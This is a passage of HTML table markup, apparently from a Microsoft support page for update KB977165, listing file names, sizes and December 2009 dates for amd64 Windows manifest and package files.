class=\"sbody-td\">Amd64_b506a7517fbf46dcfff0b424bc5ae1f2_31bf3856ad364e35_6.0.6002.22283_none_e49895306dccf4fc.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_d5610cf43fd600e81745bc10a1eaf2f3_31bf3856ad364e35_6.0.6000.21175_none_33ce29d427e3f7a4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_e9ac986fb0ce7f4d696c4518df6bb168_31bf3856ad364e35_6.0.6000.16973_none_905e14006959e1d4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6000.16973_none_c620159a6f8ff9be.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">23:23</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6000.21175_none_c6ab8b1b88abff78.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">22:11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.18377_none_c80a55686cb2f00b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">22:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.22577_none_c893f41985d08cfc.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">00:27</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.18160_none_c9f4971c69d77504.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.22283_none_ca6b94ed830298b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,512</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:20</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,754</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,461</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,919</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,630</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,759</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,466</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,759</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,126</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,242</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,962</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,242</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,962</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,760</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_9_for_kb977165_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,755</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_9_for_kb977165~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,463</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_0~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_1~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,384</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_2_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,688</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_2~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,715</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,973</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,016</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr 